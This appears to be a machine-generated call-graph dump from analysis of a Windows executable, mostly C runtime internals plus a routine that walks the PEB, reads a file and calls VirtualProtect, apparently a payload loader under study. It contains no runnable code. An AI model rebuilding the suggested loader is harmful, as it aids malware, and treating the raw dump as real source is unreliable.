___scrt_is_nonwritable_in_current_image 17062->17063 17075 d41d11 EnterCriticalSection 17063->17075 17065 d45e2a 17076 d45c11 17065->17076 17067 d45e42 17080 d45e62 17067->17080 17070->17059 17074 d41d28 LeaveCriticalSection 17071->17074 17073 d45cca 17073->17062 17074->17073 17075->17065 17077 d45c47 __Getctype 17076->17077 17078 d45c20 __Getctype 17076->17078 17077->17067 17078->17077 17083 d49e8a 17078->17083 17157 d41d28 LeaveCriticalSection 17080->17157 17082 d45a87 17082->16946 17085 d49f0a 17083->17085 17086 d49ea0 17083->17086 17087 d456b7 ___free_lconv_mon 14 API calls 17085->17087 17109 d49f58 17085->17109 17086->17085 17091 d456b7 ___free_lconv_mon 14 API calls 17086->17091 17104 d49ed3 17086->17104 17088 d49f2c 17087->17088 17089 d456b7 ___free_lconv_mon 14 API calls 17088->17089 17092 d49f3f 17089->17092 17090 d456b7 ___free_lconv_mon 14 API calls 17093 d49eff 17090->17093 17095 d49ec8 17091->17095 17097 d456b7 ___free_lconv_mon 14 API calls 17092->17097 17098 d456b7 ___free_lconv_mon 14 API calls 17093->17098 17094 d49fc6 17099 d456b7 ___free_lconv_mon 14 API calls 17094->17099 17111 d492e1 17095->17111 17096 d456b7 ___free_lconv_mon 14 API calls 17101 d49eea 17096->17101 17102 d49f4d 17097->17102 17098->17085 17103 d49fcc 17099->17103 17139 d495fd 17101->17139 17106 d456b7 ___free_lconv_mon 14 API calls 17102->17106 17103->17077 17104->17096 17108 d49ef5 17104->17108 17106->17109 17107 d456b7 14 API calls ___free_lconv_mon 17110 d49f66 17107->17110 17108->17090 17151 d4a024 17109->17151 17110->17094 17110->17107 17112 d492f2 17111->17112 17138 d493db 17111->17138 17113 d49303 17112->17113 17114 d456b7 ___free_lconv_mon 14 API calls 17112->17114 17115 d49315 17113->17115 17116 d456b7 ___free_lconv_mon 14 API calls 17113->17116 17114->17113 17117 d49327 17115->17117 17119 d456b7 ___free_lconv_mon 14 API calls 17115->17119 17116->17115 17118 d49339 17117->17118 17120 d456b7 ___free_lconv_mon 14 API calls 17117->17120 17121 d4934b 17118->17121 17122 d456b7 ___free_lconv_mon 14 API calls 17118->17122 17119->17117 17120->17118 17123 d4935d 17121->17123 17124 d456b7 ___free_lconv_mon 14 API calls 17121->17124 17122->17121 17125 d456b7 ___free_lconv_mon 14 API calls 17123->17125 17124->17123 17138->17104 17140 d49662 17139->17140 17141 d4960a 17139->17141 17140->17108 17142 d4961a 17141->17142 17144 d456b7 ___free_lconv_mon 14 API calls 17141->17144 17143 d4962c 17142->17143 17145 d456b7 ___free_lconv_mon 14 API calls 17142->17145 17146 d4963e 17143->17146 17147 d456b7 ___free_lconv_mon 14 API calls 17143->17147 17144->17142 17145->17143 17148 d49650 17146->17148 17149 d456b7 ___free_lconv_mon 14 API calls 17146->17149 17147->17146 17148->17140 17150 d456b7 ___free_lconv_mon 14 API calls 17148->17150 17149->17148 17150->17140 17152 d4a031 17151->17152 17156 d4a050 17151->17156 17153 d496eb __Getctype 14 API calls 17152->17153 17152->17156 17154 d4a04a 17153->17154 17155 d456b7 ___free_lconv_mon 14 API calls 17154->17155 17155->17156 17156->17110 17157->17082 17208 d47d63 17158->17208 17162 d47b13 ___scrt_is_nonwritable_in_current_image 17161->17162 17163 d45a9b __dosmaperr 14 API calls 17162->17163 17164 d47b63 17162->17164 17165 d47b75 CallUnexpected 17162->17165 17170 d47b44 CallUnexpected 17162->17170 17163->17170 17166 d41314 __dosmaperr 14 API calls 17164->17166 17167 d47bab CallUnexpected 17165->17167 17222 d41d11 EnterCriticalSection 17165->17222 17168 d47b68 17166->17168 17173 d47ce5 17167->17173 17174 d47be8 17167->17174 17184 d47c16 17167->17184 17219 d419ff 17168->17219 17170->17164 17170->17165 17187 d47b4d 17170->17187 17175 d47cf0 17173->17175 17254 d41d28 LeaveCriticalSection 17173->17254 17174->17184 17223 d4594a GetLastError 17174->17223 17178 d3f18f CallUnexpected 21 API calls 17175->17178 17180 d47cf8 17178->17180 17181 d4594a __Getctype 48 API calls 17185 d47c6b 17181->17185 17183 d4594a __Getctype 48 API calls 17183->17184 17250 d47c91 17184->17250 17186 d4594a __Getctype 48 API calls 17185->17186 17185->17187 17186->17187 17187->16998 17189 d41a7c std::invalid_argument::invalid_argument CallUnexpected 17188->17189 17190 d41aa8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17189->17190 17191 d41b79 CallUnexpected 17190->17191 17269 d371d1 17191->17269 17193 d41b97 17193->16998 17195 d44476 17194->17195 17196 d44479 GetLastError 17194->17196 17195->16998 17277 d4f5f0 17196->17277 17199 d444f3 SetLastError 17199->16998 17200 d4f62b ___vcrt_FlsSetValue 6 API calls 17201 d444a7 __Getctype 17200->17201 17202 d444cf 17201->17202 17203 d4f62b ___vcrt_FlsSetValue 6 API calls 17201->17203 17207 d444ad 17201->17207 17204 d4f62b ___vcrt_FlsSetValue 6 API calls 17202->17204 17205 d444e3 17202->17205 17203->17202 17204->17205 17282 d42a5e 17205->17282 17207->17199 17209 d47d6f ___scrt_is_nonwritable_in_current_image 17208->17209 17214 d41d11 EnterCriticalSection 17209->17214 17211 d47d7d 17215 d47dbf 17211->17215 17214->17211 17218 d41d28 LeaveCriticalSection 17215->17218 17217 d47b05 17217->16998 17218->17217 17255 d41c4e 17219->17255 17221 d41a0b 17221->17187 17222->17167 17224 d45960 17223->17224 17225 d45966 17223->17225 17226 d46374 __dosmaperr 6 API calls 17224->17226 17227 d463b3 __dosmaperr 6 API calls 17225->17227 17229 d4596a SetLastError 17225->17229 17226->17225 17228 d45982 17227->17228 17228->17229 17231 d469f4 __dosmaperr 14 API calls 17228->17231 17233 d459ff 17229->17233 17234 d459fa 17229->17234 17232 d45997 17231->17232 17235 d459b0 17232->17235 17236 d4599f 17232->17236 17237 d41f83 CallUnexpected 46 API calls 17233->17237 17234->17183 17239 d463b3 __dosmaperr 6 API calls 17235->17239 17238 d463b3 __dosmaperr 6 API calls 17236->17238 17240 d45a04 17237->17240 17248 d459ad 17238->17248 17241 d459bc 17239->17241 17242 d459d7 17241->17242 17243 d459c0 17241->17243 17244 d45c5c __dosmaperr 14 API calls 17242->17244 17245 d463b3 __dosmaperr 6 API calls 17243->17245 17247 d459e2 17244->17247 17245->17248 17246 d456b7 ___free_lconv_mon 14 API calls 17246->17229 17249 d456b7 ___free_lconv_mon 14 API calls 17247->17249 17248->17246 17249->17229 17251 d47c95 17250->17251 17252 d47c5d 17250->17252 17268 d41d28 LeaveCriticalSection 17251->17268 17252->17181 17252->17185 17252->17187 17254->17175 17256 d41c60 _Fputc 17255->17256 17259 d41ba8 17256->17259 17258 d41c78 _Fputc 17258->17221 17260 d41bbf 17259->17260 17261 d41bb8 17259->17261 17263 d41c25 __strnicoll GetLastError SetLastError 17260->17263 17265 d41bcd 17260->17265 17262 d3d620 __strnicoll 16 API calls 17261->17262 17262->17260 17264 d41bf4 17263->17264 17264->17265 17266 d41a2c __Getctype 11 API calls 17264->17266 17265->17258 17267 d41c24 17266->17267 17268->17252 17270 d371da IsProcessorFeaturePresent 17269->17270 17271 d371d9 17269->17271 17273 d395cd 17270->17273 17271->17193 17276 d396b3 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17273->17276 17275 d396b0 17275->17193 17276->17275 17278 d4f6fb ___vcrt_FlsGetValue 5 API calls 17277->17278 17279 d4f60a 17278->17279 17280 d4f622 TlsGetValue 17279->17280 17281 d4448e 17279->17281 17280->17281 17281->17199 17281->17200 17281->17207 17283 d456b7 ___free_lconv_mon 14 API calls 17282->17283 17284 d42a76 17283->17284 17284->17207 17318 d3c7ea 17285->17318 17288 d474e0 17290 d474f7 17288->17290 17291 d474e5 GetACP 17288->17291 17289 d474ce GetOEMCP 17289->17290 17290->16958 17292 d456f1 17290->17292 17291->17290 17293 d4572f 17292->17293 17297 d456ff __dosmaperr 17292->17297 17295 d41314 __dosmaperr 14 API calls 17293->17295 17294 d4571a RtlAllocateHeap 17296 d4572d 17294->17296 17294->17297 17295->17296 17296->16954 17296->16955 17297->17293 17297->17294 17298 d3f4ab std::ios_base::_Init 2 API calls 17297->17298 17298->17297 17300 d474ad 50 API calls 17299->17300 17301 d472c8 17300->17301 17302 d473cd 17301->17302 17304 d47305 IsValidCodePage 17301->17304 17309 d47320 std::invalid_argument::invalid_argument 17301->17309 17303 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17302->17303 17305 d474ab 17303->17305 17304->17302 17306 d47317 17304->17306 17305->16960 17305->16964 17307 d47340 GetCPInfo 17306->17307 17306->17309 17307->17302 17307->17309 17358 d47837 17309->17358 17311 d479e8 ___scrt_is_nonwritable_in_current_image 17310->17311 17438 d41d11 EnterCriticalSection 17311->17438 17313 d479f2 17439 d47776 17313->17439 17319 d3c808 17318->17319 17325 d3c801 17318->17325 17320 d4594a __Getctype 48 API calls 17319->17320 17319->17325 17321 d3c829 17320->17321 17326 d45f2e 17321->17326 17325->17288 17325->17289 17327 d45f41 17326->17327 17329 d3c83f 17326->17329 17327->17329 17334 d4a055 17327->17334 17330 d45f5b 17329->17330 17331 d45f83 17330->17331 17332 d45f6e 17330->17332 17331->17325 17332->17331 17355 d47242 17332->17355 17335 d4a061 ___scrt_is_nonwritable_in_current_image 17334->17335 17336 d4594a __Getctype 48 API calls 17335->17336 17337 d4a06a 17336->17337 17344 d4a0b0 17337->17344 17347 d41d11 EnterCriticalSection 17337->17347 17339 d4a088 17348 d4a0d6 17339->17348 17344->17329 17345 d41f83 CallUnexpected 48 API calls 17346 d4a0d5 17345->17346 17347->17339 17349 d4a0e4 __Getctype 17348->17349 17351 d4a099 17348->17351 17350 d49e8a __Getctype 14 API calls 17349->17350 17349->17351 17350->17351 17352 d4a0b5 17351->17352 17353 d41d28 std::_Lockit::~_Lockit LeaveCriticalSection 17352->17353 17354 d4a0ac 17353->17354 17354->17344 17354->17345 17356 d4594a __Getctype 48 API calls 17355->17356 17357 d47247 17356->17357 17357->17331 17359 d4785f GetCPInfo 17358->17359 17368 d47928 17358->17368 17364 d47877 17359->17364 17359->17368 17361 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17363 d479da 17361->17363 17363->17302 17369 d46ce0 17364->17369 17368->17361 17370 d3c7ea __strnicoll 48 API calls 17369->17370 17371 d46d00 17370->17371 17389 d4573f 17371->17389 17373 d46dbc 17376 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17373->17376 17374 d46db4 17392 d39f07 17374->17392 17375 d46d2d 17375->17373 17375->17374 17378 d456f1 __strnicoll 15 API calls 17375->17378 17380 d46d52 std::invalid_argument::invalid_argument __alloca_probe_16 17375->17380 17379 d46ddf 17376->17379 17378->17380 17384 d46de1 17379->17384 17380->17374 17381 d4573f __strnicoll MultiByteToWideChar 17380->17381 17382 d46d9b 17381->17382 17382->17374 17383 d46da2 GetStringTypeW 17382->17383 17383->17374 17385 d3c7ea __strnicoll 48 API calls 17384->17385 17386 d46df4 17385->17386 17398 d46e2a 17386->17398 17396 d45769 17389->17396 17393 d39f22 17392->17393 17394 d39f11 17392->17394 17393->17373 17394->17393 17395 d42a5e __freea 14 API calls 17394->17395 17395->17393 17397 d4575b MultiByteToWideChar 17396->17397 17397->17375 17399 d46e45 __strnicoll 17398->17399 17400 d4573f __strnicoll MultiByteToWideChar 17399->17400 17404 d46e89 17400->17404 17401 d47004 17404->17401 17405 d456f1 __strnicoll 15 API calls 17404->17405 17407 d46eaf __alloca_probe_16 17404->17407 17418 d46f57 17404->17418 17405->17407 17407->17418 17438->17313 17449 d433bb 17439->17449 17441 d47798 17442 d433bb 29 API calls 17441->17442 17443 d477b7 17442->17443 17444 d477de 17443->17444 17445 d456b7 ___free_lconv_mon 14 API calls 17443->17445 17446 d47a1d 17444->17446 17445->17444 17463 d41d28 LeaveCriticalSection 17446->17463 17448 d47a0b 17448->16965 17450 d433cc 17449->17450 17459 d433c8 _Yarn 17449->17459 17451 d433e6 std::invalid_argument::invalid_argument 17450->17451 17452 d433d3 17450->17452 17456 d43414 17451->17456 17457 d4341d 17451->17457 17451->17459 17453 d41314 __dosmaperr 14 API calls 17452->17453 17454 d433d8 17453->17454 17455 d419ff __strnicoll 29 API calls 17454->17455 17455->17459 17458 d41314 __dosmaperr 14 API calls 17456->17458 17457->17459 17461 d41314 __dosmaperr 14 API calls 17457->17461 17460 d43419 17458->17460 17459->17441 17462 d419ff __strnicoll 29 API calls 17460->17462 17461->17460 17462->17459 17463->17448 17465 d4533a 17464->17465 17466 d45348 17464->17466 17465->17466 17471 d45360 17465->17471 17467 d41314 __dosmaperr 14 API calls 17466->17467 17468 d45350 17467->17468 17469 d419ff __strnicoll 29 API calls 17468->17469 17470 d4535a 17469->17470 17470->16913 17471->17470 17472 d41314 __dosmaperr 14 API calls 17471->17472 17472->17468 17474 d417f3 17473->17474 17478 d41810 17473->17478 17475 d4180a 17474->17475 17476 d456b7 ___free_lconv_mon 14 API calls 17474->17476 17477 d456b7 ___free_lconv_mon 14 API calls 17475->17477 17476->17474 17477->17478 17478->16911 17480 d41a38 17479->17480 17481 d41a60 CallUnexpected 8 API calls 17480->17481 17482 d41a4d GetCurrentProcess TerminateProcess 17481->17482 17482->16917 17484 d4ca50 17483->17484 17485 d4ca61 17484->17485 17487 d4ca74 ___from_strstr_to_strchr 17484->17487 17486 d41314 __dosmaperr 14 API calls 17485->17486 17496 d4ca66 17486->17496 17488 d4cc8b 17487->17488 17489 d4ca94 17487->17489 17490 d41314 __dosmaperr 14 API calls 17488->17490 17546 d4ccb0 17489->17546 17492 d4cc90 17490->17492 17494 d456b7 ___free_lconv_mon 14 API calls 17492->17494 17494->17496 17495 d4cad8 17532 d4cac4 17495->17532 17550 d4ccca 17495->17550 17496->16858 17497 d4cada 17501 d469f4 __dosmaperr 14 API calls 17497->17501 17497->17532 17499 d4cab6 17506 d4cad3 17499->17506 17507 d4cabf 17499->17507 17503 d4cae8 17501->17503 17502 d456b7 ___free_lconv_mon 14 API calls 17502->17496 17505 d456b7 ___free_lconv_mon 14 API calls 17503->17505 17504 d4cb4d 17509 d456b7 ___free_lconv_mon 14 API calls 17504->17509 17510 d4caf3 17505->17510 17508 d4ccb0 48 API calls 17506->17508 17511 d41314 __dosmaperr 14 API calls 17507->17511 17508->17495 17517 d4cb55 17509->17517 17510->17495 17515 d469f4 __dosmaperr 14 API calls 17510->17515 17510->17532 17511->17532 17512 d4cb98 17513 d4c065 std::ios_base::_Init 32 API calls 17512->17513 17512->17532 17514 d4cbc6 17513->17514 17516 d456b7 ___free_lconv_mon 14 API calls 17514->17516 17519 d4cb0f 17515->17519 17522 d4cb82 17516->17522 17517->17522 17554 d4c065 17517->17554 17518 d4cc80 17520 d456b7 ___free_lconv_mon 14 API calls 17518->17520 17523 d456b7 ___free_lconv_mon 14 API calls 17519->17523 17520->17496 17522->17518 17522->17522 17526 d469f4 __dosmaperr 14 API calls 17522->17526 17522->17532 17523->17495 17524 d4cb79 17525 d456b7 ___free_lconv_mon 14 API calls 17524->17525 17525->17522 17527 d4cc11 17526->17527 17528 d4cc21 17527->17528 17529 d4cc19 17527->17529 17531 d4532c ___std_exception_copy 29 API calls 17528->17531 17530 d456b7 ___free_lconv_mon 14 API calls 17529->17530 17530->17532 17533 d4cc2d 17531->17533 17532->17502 17534 d4cc34 17533->17534 17535 d4cca5 17533->17535 17563 d5392c 17534->17563 17536 d41a2c __Getctype 11 API calls 17535->17536 17538 d4ccaf 17536->17538 17540 d4cc7a 17542 d456b7 ___free_lconv_mon 14 API calls 17540->17542 17541 d4cc5b 17543 d41314 __dosmaperr 14 API calls 17541->17543 17542->17518 17544 d4cc60 17543->17544 17545 d456b7 ___free_lconv_mon 14 API calls 17544->17545 17545->17532 17547 d4ccbd 17546->17547 17549 d4ca9f 17546->17549 17578 d4cd1f 17547->17578 17549->17495 17549->17497 17549->17499 17551 d4cb3d 17550->17551 17553 d4cce0 17550->17553 17551->17504 17551->17512 17553->17551 17593 d5383b 17553->17593 17555 d4c072 17554->17555 17556 d4c08d 17554->17556 17555->17556 17557 d4c07e 17555->17557 17558 d4c09c 17556->17558 17693 d527c4 17556->17693 17559 d41314 __dosmaperr 14 API calls 17557->17559 17700 d4f005 17558->17700 17561 d4c083 std::invalid_argument::invalid_argument 17559->17561 17561->17524 17712 d469b5 17563->17712 17568 d5399f 17570 d456b7 ___free_lconv_mon 14 API calls 17568->17570 17571 d539ab 17568->17571 17569 d469b5 48 API calls 17573 d5397c 17569->17573 17570->17571 17572 d4cc55 17571->17572 17574 d456b7 ___free_lconv_mon 14 API calls 17571->17574 17572->17540 17572->17541 17575 d3c8e4 17 API calls 17573->17575 17574->17572 17576 d53989 17575->17576 17576->17568 17577 d53993 SetEnvironmentVariableW 17576->17577 17577->17568 17579 d4cd32 17578->17579 17580 d4cd2d 17578->17580 17581 d469f4 __dosmaperr 14 API calls 17579->17581 17580->17549 17582 d4cd4f 17581->17582 17583 d4cdbd 17582->17583 17586 d4cdc2 17582->17586 17589 d469f4 __dosmaperr 14 API calls 17582->17589 17590 d456b7 ___free_lconv_mon 14 API calls 17582->17590 17591 d4532c ___std_exception_copy 29 API calls 17582->17591 17592 d4cdac 17582->17592 17584 d41f83 CallUnexpected 48 API calls 17583->17584 17584->17586 17585 d456b7 ___free_lconv_mon 14 API calls 17585->17580 17587 d41a2c __Getctype 11 API calls 17586->17587 17588 d4cdce 17587->17588 17589->17582 17590->17582 17591->17582 17592->17585 17594 d5384f 17593->17594 17595 d53849 17593->17595 17611 d53864 17594->17611 17598 d54063 17595->17598 17599 d540ab 17595->17599 17601 d54069 17598->17601 17602 d54086 17598->17602 17631 d540c1 17599->17631 17604 d41314 __dosmaperr 14 API calls 17601->17604 17606 d41314 __dosmaperr 14 API calls 17602->17606 17610 d540a4 17602->17610 17603 d54079 17603->17553 17605 d5406e 17604->17605 17607 d419ff __strnicoll 29 API calls 17605->17607 17608 d54095 17606->17608 17607->17603 17609 d419ff __strnicoll 29 API calls 17608->17609 17609->17603 17610->17553 17612 d3c7ea __strnicoll 48 API calls 17611->17612 17613 d5387a 17612->17613 17614 d53896 17613->17614 17615 d538ad 17613->17615 17630 d5385f 17613->17630 17616 d41314 __dosmaperr 14 API calls 17614->17616 17617 d538b6 17615->17617 17618 d538c8 17615->17618 17619 d5389b 17616->17619 17621 d41314 __dosmaperr 14 API calls 17617->17621 17622 d538d5 17618->17622 17623 d538e8 17618->17623 17620 d419ff __strnicoll 29 API calls 17619->17620 17620->17630 17624 d538bb 17621->17624 17625 d540c1 __strnicoll 48 API calls 17622->17625 17649 d5418c 17623->17649 17627 d419ff __strnicoll 29 API calls 17624->17627 17625->17630 17627->17630 17629 d41314 __dosmaperr 14 API calls 17629->17630 17630->17553 17632 d540d1 17631->17632 17633 d540eb 17631->17633 17634 d41314 __dosmaperr 14 API calls 17632->17634 17635 d540f3 17633->17635 17636 d5410a 17633->17636 17637 d540d6 17634->17637 17638 d41314 __dosmaperr 14 API calls 17635->17638 17639 d54116 17636->17639 17640 d5412d 17636->17640 17641 d419ff __strnicoll 29 API calls 17637->17641 17642 d540f8 17638->17642 17643 d41314 __dosmaperr 14 API calls 17639->17643 17644 d3c7ea __strnicoll 48 API calls 17640->17644 17647 d540e1 17640->17647 17641->17647 17645 d419ff __strnicoll 29 API calls 17642->17645 17646 d5411b 17643->17646 17644->17647 17645->17647 17648 d419ff __strnicoll 29 API calls 17646->17648 17647->17603 17648->17647 17650 d3c7ea __strnicoll 48 API calls 17649->17650 17651 d5419f 17650->17651 17654 d541d2 17651->17654 17655 d54206 __strnicoll 17654->17655 17658 d5446a 17655->17658 17659 d54286 17655->17659 17661 d54273 GetCPInfo 17655->17661 17664 d5428a 17655->17664 17656 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17657 d538fe 17656->17657 17657->17629 17657->17630 17660 d4573f __strnicoll MultiByteToWideChar 17659->17660 17659->17664 17663 d5430c 17660->17663 17661->17659 17661->17664 17662 d5445e 17665 d39f07 __freea 14 API calls 17662->17665 17663->17662 17663->17664 17666 d456f1 __strnicoll 15 API calls 17663->17666 17667 d54333 __alloca_probe_16 17663->17667 17664->17656 17664->17658 17665->17664 17666->17667 17667->17662 17668 d4573f __strnicoll MultiByteToWideChar 17667->17668 17669 d5437f 17668->17669 17669->17662 17670 d4573f __strnicoll MultiByteToWideChar 17669->17670 17671 d5439b 17670->17671 17671->17662 17672 d543a9 17671->17672 17673 d5440c 17672->17673 17674 d456f1 __strnicoll 15 API calls 17672->17674 17678 d543c2 __alloca_probe_16 17672->17678 17675 d39f07 __freea 14 API calls 17673->17675 17674->17678 17676 d54412 17675->17676 17677 d39f07 __freea 14 API calls 17676->17677 17677->17664 17678->17673 17679 d4573f __strnicoll MultiByteToWideChar 17678->17679 17680 d54405 17679->17680 17680->17673 17681 d5442e 17680->17681 17687 d46245 17681->17687 17684 d39f07 __freea 14 API calls 17688 d467ac std::_Lockit::_Lockit 5 API calls 17687->17688 17689 d46250 17688->17689 17690 d46256 17689->17690 17691 d4658f __strnicoll 5 API calls 17689->17691 17690->17684 17692 d46296 CompareStringW 17691->17692 17692->17690 17694 d527e4 HeapSize 17693->17694 17695 d527cf 17693->17695 17694->17558 17696 d41314 __dosmaperr 14 API calls 17695->17696 17697 d527d4 17696->17697 17698 d419ff __strnicoll 29 API calls 17697->17698 17699 d527df 17698->17699 17699->17558 17701 d4f012 17700->17701 17702 d4f01d 17700->17702 17703 d456f1 __strnicoll 15 API calls 17701->17703 17704 d4f025 17702->17704 17710 d4f02e __dosmaperr 17702->17710 17708 d4f01a 17703->17708 17705 d456b7 ___free_lconv_mon 14 API calls 17704->17705 17705->17708 17706 d4f033 17709 d41314 __dosmaperr 14 API calls 17706->17709 17707 d4f058 HeapReAlloc 17707->17708 17707->17710 17708->17561 17709->17708 17710->17706 17710->17707 17711 d3f4ab std::ios_base::_Init 2 API calls 17710->17711 17711->17710 17713 d3c7ea __strnicoll 48 API calls 17712->17713 17714 d469c7 17713->17714 17715 d469d9 17714->17715 17720 d46226 17714->17720 17717 d3c8e4 17715->17717 17726 d3c93c 17717->17726 17723 d46792 17720->17723 17724 d4670d std::_Lockit::_Lockit 5 API calls 17723->17724 17725 d4622e 17724->17725 17725->17715 17727 d3c964 17726->17727 17728 d3c94a 17726->17728 17729 d3c96b 17727->17729 17730 d3c98a 17727->17730 17744 d3c8ca 17728->17744 17732 d3c8fc 17729->17732 17748 d3c88b 17729->17748 17733 d4573f __strnicoll MultiByteToWideChar 17730->17733 17732->17568 17732->17569 17735 d3c999 17733->17735 17736 d3c9a0 GetLastError 17735->17736 17738 d3c88b 15 API calls 17735->17738 17741 d3c9c6 17735->17741 17753 d4133a 17736->17753 17738->17741 17739 d4573f __strnicoll MultiByteToWideChar 17742 d3c9dd 17739->17742 17741->17732 17741->17739 17742->17732 17742->17736 17743 d41314 __dosmaperr 14 API calls 17743->17732 17745 d3c8dd 17744->17745 17746 d3c8d5 17744->17746 17745->17732 17747 d456b7 ___free_lconv_mon 14 API calls 17746->17747 17747->17745 17749 d3c8ca 14 API calls 17748->17749 17750 d3c899 17749->17750 17758 d3c86c 17750->17758 17761 d41327 17753->17761 17755 d41345 __dosmaperr 17756 d41314 __dosmaperr 14 API calls 17755->17756 17757 d3c9ac 17756->17757 17757->17743 17759 d456f1 __strnicoll 15 API calls 17758->17759 17760 d3c879 17759->17760 17760->17732 17762 d45a9b __dosmaperr 14 API calls 17761->17762 17763 d4132c 17762->17763 17763->17755 17767 d32010 GetModuleHandleA GetModuleFileNameW 17764->17767 17774 d4401a 17767->17774 17769 d32081 17778 d31f00 17769->17778 17772 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17773 d32099 17772->17773 17773->16722 17775 d4402d _Fputc 17774->17775 17787 d4408f 17775->17787 17777 d4403f _Fputc 17777->17769 17829 d31ba0 GetPEB 17778->17829 17780 d31f1f 17830 d31c10 GetProcAddress 17780->17830 17782 d31f39 17783 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17782->17783 17784 d31ffb 17783->17784 17784->17772 17785 d31f31 17785->17782 17843 d31db0 17785->17843 17788 d440bf 17787->17788 17789 d440ec 17788->17789 17790 d440ce 17788->17790 17808 d440c3 17788->17808 17800 d440f9 17789->17800 17811 d3d5c0 17789->17811 17791 d41ba8 __strnicoll 29 API calls 17790->17791 17791->17808 17792 d44131 17797 d44145 17792->17797 17798 d442c1 17792->17798 17793 d44113 17817 d4f46b 17793->17817 17794 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17799 d44334 17794->17799 17802 d441df 17797->17802 17806 d44189 17797->17806 17797->17808 17801 d45801 _Fputc WideCharToMultiByte 17798->17801 17798->17808 17799->17777 17800->17792 17800->17793 17801->17808 17803 d45801 _Fputc WideCharToMultiByte 17802->17803 17805 d441f2 17803->17805 17804 d45801 _Fputc WideCharToMultiByte 17804->17808 17807 d4420b GetLastError 17805->17807 17805->17808 17806->17804 17807->17808 17810 d4421a 17807->17810 17808->17794 17809 d45801 _Fputc WideCharToMultiByte 17809->17810 17810->17808 17810->17809 17812 d3d5d0 17811->17812 17821 d45f88 17812->17821 17820 d4f4a2 _Yarn std::_Locinfo::_Locinfo_dtor 17817->17820 17818 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17819 d4f578 17818->17819 17819->17808 17820->17818 17822 d3d5ed 17821->17822 17823 d45f9f 17821->17823 17825 d45fb9 17822->17825 17823->17822 17824 d4a055 __Getctype 48 API calls 17823->17824 17824->17822 17826 d3d5fa 17825->17826 17827 d45fd0 17825->17827 17826->17800 17827->17826 17828 d47242 __strnicoll 48 API calls 17827->17828 17828->17826 17829->17780 17831 d31c59 CreateFileA 17830->17831 17832 d31cb3 GetFileSize 17831->17832 17833 d31caa 17831->17833 17834 d31cd9 CloseHandle 17832->17834 17836 d31cf1 17832->17836 17835 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17833->17835 17834->17833 17837 d31d98 17835->17837 17838 d31cfc ReadFile 17836->17838 17837->17785 17839 d31d70 CloseHandle 17838->17839 17840 d31d3c 17838->17840 17839->17833 17841 d31d58 CloseHandle 17840->17841 17842 d31d4d 17840->17842 17841->17833 17842->17841 17855 d31000 17843->17855 17846 d31000 115 API calls 17847 d31e5b GetProcAddress 17846->17847 17848 d31e84 VirtualProtect 17847->17848 17850 d31ed1 17848->17850 17851 d31edc 17848->17851 17866 d31bd0 17850->17866 17853 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17851->17853 17854 d31eeb 17853->17854 17854->17782 17856 d31056 17855->17856 17870 d31440 17856->17870 17858 d313c7 17899 d31b80 17858->17899 17863 d31167 _Yarn 17863->17858 17865 d42a5e __freea 14 API calls 17863->17865 17874 d31490 17863->17874 17877 d314c0 17863->17877 17893 d31af0 17863->17893 17865->17863 17867 d31bfa 17866->17867 17868 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17867->17868 17869 d31c04 17868->17869 17869->17851 17871 d31466 std::ios_base::_Init 17870->17871 17872 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17871->17872 17873 d31487 17872->17873 17873->17863 17902 d32410 17874->17902 17876 d314aa 17876->17863 17879 d31510 _strlen 17877->17879 17949 d33090 17879->17949 17880 d315b1 17886 d315c4 17880->17886 17953 d331c0 17880->17953 17975 d335f0 17886->17975 17894 d31b20 _Fputc 17893->17894 18145 d32130 17894->18145 17897 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17898 d31b4e 17897->17898 17898->17863 18164 d32230 17899->18164 17903 d32458 17902->17903 17904 d3243f 17902->17904 17906 d324f0 17903->17906 17904->17876 17907 d32533 std::ios_base::_Init 17906->17907 17925 d327a0 17907->17925 17910 d3258a 17929 d32820 17910->17929 17926 d327bb std::ios_base::_Init 17925->17926 17927 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17926->17927 17928 d32578 17927->17928 17928->17910 17940 d32800 17928->17940 17930 d32837 17929->17930 17931 d327a0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17930->17931 17932 d325a1 17931->17932 17933 d328a0 17932->17933 17934 d32af0 30 API calls 17933->17934 17935 d328ba 17934->17935 17941 d37974 std::ios_base::_Init 30 API calls 17940->17941 17942 d32812 17941->17942 17950 d330d9 17949->17950 17951 d330f1 17950->17951 17983 d33720 17950->17983 17951->17880 17991 d374e4 17953->17991 17957 d33217 17958 d33255 17957->17958 18012 d33ac0 17957->18012 18005 d37515 17958->18005 17976 d33615 17975->17976 18126 d34de0 17976->18126 17979 d33640 17980 d33654 17979->17980 17981 d3366f 17980->17981 18141 d36940 17980->18141 17984 d33762 17983->17984 17985 d33090 39 API calls 17984->17985 17987 d33815 17984->17987 17989 d3377d 17985->17989 17986 d33640 39 API calls 17986->17987 17987->17951 17988 d335f0 39 API calls 17990 d33790 17988->17990 